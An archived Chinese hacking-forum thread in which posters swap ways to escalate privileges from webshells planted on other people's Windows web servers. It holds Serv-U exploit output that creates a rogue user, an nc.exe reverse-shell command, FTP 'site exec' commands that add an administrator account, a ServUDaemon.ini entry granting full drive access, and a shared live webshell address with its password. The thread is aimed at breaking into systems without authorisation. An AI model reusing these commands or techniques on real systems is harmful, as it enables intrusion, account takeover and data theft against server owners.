[讨论]无法提权!
无法浏览别的盘,提示
Microsoft VBScript 运行时错误 错误 '800a004c'
路径未找到
/system.asp,行 0
无法转到别的目录!
大家看看有什么好的办法提权! 不能提的多了……我自己都很多提不了 [s:40] 找下有权限的目录 [s:34] 跳转常用目录,程序,用户等。
尝试其他脚本的权限,查看组件是否存在,尽可能发掘目标主机的信息再做分析。 如果目录有继承关系,那么是可以跳转的貌似.... [s:66] 可以尝试Guest权限下的FTP休谈~~~~ 我也有一个问题``
希望你们提供解决方法。遇到一WEBSHELL
我传了个CMD。EXE上去。可以运行一些命令。可是一运行建立用户的命令就没反映了也不提示什么啊
用Serv-U.rar 也提不了。FTP命令也运行 不了
我实在没办法 了。希望你们帮忙下`` Guest权限下的FTP嗅探,怎么嗅探? 运行嗅探器就可以了。
guest权限
貌似可以的。 不是每个网站都可以提的 多用点EXP [quote][b]引用第8楼[i]remax[/i]于[i]2006-11-27 12:39[/i]发表的[/b]:
运行嗅探器就可以了。
guest权限
貌似可以的。[/quote]
这个到是可以,但是也得你有CMD LINE ,你有EXE权限……
不是吗? [quote][b]引用第9楼[i]56789789[/i]于[i]2006-11-29 20:44[/i]发表的[/b]:
不是每个网站都可以提的 多用点EXP[/quote]
这个到是
我遇到太多的机器
权限设置的很变态,端口也做防扫描的处理,网页也是
碰到运气好的有了默认的数据库了,进去一看,什么脚本都不给运行,CMD也模拟不了
这个DD,怎么去提?
我有点想买兄灭了那ADMINISTRATOR!
就是没钱
NND 我朋友给了一个webshell 据他说这个webshell是那个站上自带的后门程序! 也不是他上传上去的
仅仅在C:\PHP能写入文件!!但不能上传EXE文件 其他都行 哪位能指点指点呢 支持PHP的话,找My.ini里面的ROot密码,然后用PHPSHELL执行SQL语句导入Mix.DLL就O了 [quote][b]引用第13楼[i]流转[/i]于[i]2006-12-02 07:59[/i]发表的[/b]:
支持PHP的话,找My.ini里面的ROot密码,然后用PHPSHELL执行SQL语句导入Mix.DLL就O了[/quote]
可问题是我并没有PHPSHELL 网站目录什么都传不上去 就c;\php 可以传上文件 提权跟浏览别的盘没有必定的关系
你可以就在你的WEB目录下上传文件来提权试试 网站的目录不能上传,但我想应该可以编辑它原来的文件,改成后缀为.php的shell,可能会有效果。 我也遇到一个设置很变态的主机,可以浏览所有的文件,就是没有办法打开c盘下的文件,复制,下载,其它盘都没用
传了个cmd.exe上去,任何命令都可以执行,一添加用户就没反映,其它诸如传木马上去后,也无下落,服务器也没装server-u,是2003自带的, 我也有很多WEBSHELL不能提权! *** 作者被禁止或删除 内容自动屏蔽 *** C:\Documents and Settings\All Users\Documents
你看看这里..
一般都有权限! 看看C:\Documents and Settings\All Users\application data\下面有些信息~应该有有用的线索 我遇到一个WEBSHELL
任何盘都可以浏览 可以说绝大部分的目录都有修改权限 就是只有一个目录下的文件没有修改权限 请问为什么呢 不一定跨不了目录提权就难 也不一定每个目录都能跨了就可以提权~~~
虽然不能跨目录,但是如果服务器配置只对用户组进行了限制,对一些关键的目录权限没设置好通过上传的CMD 接和一些避开NET命令的语句一样可以提!~~ 我也有很多WEBSHELL不能提权! 但是遇到一个让很好奇 用SU提权时显示成功 但是看不到用户
我以为NET没权限 但是我传了个NET 但还是加不了用户 看了好几天的webshell 下的提权。
1 关键要找到 everyone权限的目录。如果找不到,是时候想想其他办法了。没有运行权限怎么提啊?
2 找到 everyone的时候,开始有点希望了。su. 改运行啊。rar啊。==如果这些都没有的话。是时候要出 sniffer了
网上有牛人说,有iis_wpg 权限就能 运行 sniffer。这个自己试过了,win2000还是可以的,但是win2003...没戏了。
网上还有牛人,写了一个程序,也是 guest就可以 sniffer了。但是只能sniffer到用户名.........估计高手能写出更高级的吧。
还看到一编文章说 htran nc 加本地 tftp xsniffer也能搞到 ftp 密码.....( 实在想不到这样怎么搞啊 [s:225] )
望牛人指点一二啊那就 [s:235] 了。 我用 SU提权时 显示这样的 哪位大哥可以指点下
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Domain xl:0 Deleted
<505 Domain not found
******************************************************
[+] Creating New Domain...
<200-DomainID=2
220 Domain settings saved
900-Type=DomainStat
900-ID=2
900 Online=0
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<421 Service closing control connection.
******************************************************
>PASS 111111
<421 Service closing control connection. 看了25楼的,根据我自己的理解
ht和nc并用转个cmdshell回来!
然后用tfp弄个xsniff进有everyone权限的目录
在转回来的cmdshell下,切换到该目录
运行xsniff!
这个其实有存在权限问题
2003的貌似是。。。
PS:如有说错的地方
忘不吝赐教!! 现在的虚拟主机似乎一夜之间集体牢固起来了,现有的提权方法似乎都派不上用场了。
下面这个WebShell,有办法提权的朋友可以去试试,反正我是没折了:
[url]http://www.bjjf.net/shaiyang.asp[/url](密码:ak47)
另,如果能成功提权,请分享方法。QQ:5121565 shell都被删了;也不知道是管理员删的还是谁删的 我觉得还是看看组件吧,万一赶上什么.net或是PHP能运行的呢 上面的WEBSHELL没有删,只不过你要用海洋的客户端连接。 肯定能转到这个目录C:\Documents and Settings\All Users\「开始」菜单\程序,看看有什么程序,在做出相应的判断,我运气好拿过几个虚拟主机的权限。用phpspy ,有prel,就更好办了。这样的文章很多,自己去找找看看 phpspy不是neeao他们写的那个吗,最近才放出来2006最终版 看是什么权限了,我到看到个文章————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 有空可以去看看[url]http://www.tkbbs.com/Article/HTML/7041.html[/url] 请问哪儿有Mix.dll文件?能否给我一个,网上找不到啊``` [s:269] 我遇见过,能执行NET USER命令的SHELL,但是不能加用户 [url]http://www.bjjf.net/shaiyang.asp[/url]
没想到这上面也有道德有问题的人,海洋连上去后,有病毒。 [s:268] [quote]引用第34楼憶楓于2007-04-17 03:47发表的 :
看是什么权限了,我到看到个文章————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 有空可以去看看[url]http://www.tkbbs.com/Article/HTML/7041.html[/url][/quote]
要求是sql注入点```` [quote]引用第28楼haoshu于2007-04-12 23:11发表的 :
现在的虚拟主机似乎一夜之间集体牢固起来了,现有的提权方法似乎都派不上用场了。
下面这个WebShell,有办法提权的朋友可以去试试,反正我是没折了:
[url]http://www.bjjf.net/shaiyang.asp[/url](密码:ak47)
.......[/quote]
[s:265]看到这个地址.....
其实我也在搞这个公司的站..,,不过俺技术太菜..连WEBSHELL都没拿下...搞了点时间..麻木了 不搞了.. 如果支持.NET话,建议上传一个ASPX的木马,因为ASPX是USER用户组的,ASP是GUEST用户组的,可能有意想不到的收获 怎么样看才可以知道是.net的呢。?? 就是看是否支持*.ASPX文件的解析.. 碰到一提权问题 希望能得到大家的帮忙
服务器只支持ASP语言
SERV-U 6.2
WSCRIPT存在
但是不能执行命令 我上传CMD.EXE只能执行IPCONFIG /ALL
后来上传NET.EXE NET1.EXE
也不能执行
后来写了一个BAT处理文件
NC.EXE -E CMD.EXE IP 2345
用CSRIPT 1.BAT 想反弹CMDSHELL 还是不行
真的是没有办法的了
希望牛人帮忙下 1 找个可执行的目录,像.../data /
2
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具
如果不行的话就看看“C:\\Documents and Settings\\All Users\\「开始」菜单\\程序”能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access1=d:\\|RWAMELCDP
Access1=f:\\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
3 n 多种方法,不说了,
如果实在提不了,火燃眉毛的话, contact me [quote]引用第13楼流转于2006-12-02 07:59发表的 :
支持PHP的话,找My.ini里面的ROot密码,然后用PHPSHELL执行SQL语句导入Mix.DLL就O了[/quote]
????my.ini 是 mysql 里面的吧 貌似my.ini里面不存有密码 而且 就算现在webshell 所在盘支持php 但也不能一定能看 mysql的安装 现在我有个 shell 就是 C盘有些能看 别的盘不能 而且安装mysql 的也看不到是哪个盘哦 我也遇见过一个东东,可以执行cmd了,在没有办法的情况下我上传了个开3389的东东,就是3389.exe了,没想到可以执行高兴死我了,
我执行了,明天都没有问题,可是还是开不成3389.郁闷坏我了,su覆盖提权,貌似不行,明明用户加进去了,但是su连接不可以,转发也不可以,我 一直纳闷了,可以运行3389。exe为什么不可以运行我的马呢。。这个是小问题,就说开3389吧,那工具我测试过了,可以开启的,可 就是不行,期待中, 请教下Symantec AntiVirus symtdi.sys驱动本地权限提升漏洞支持不支持WEBSHELL的使用?
我编译后WEBSHELL执行就IIS死了
页:
[1]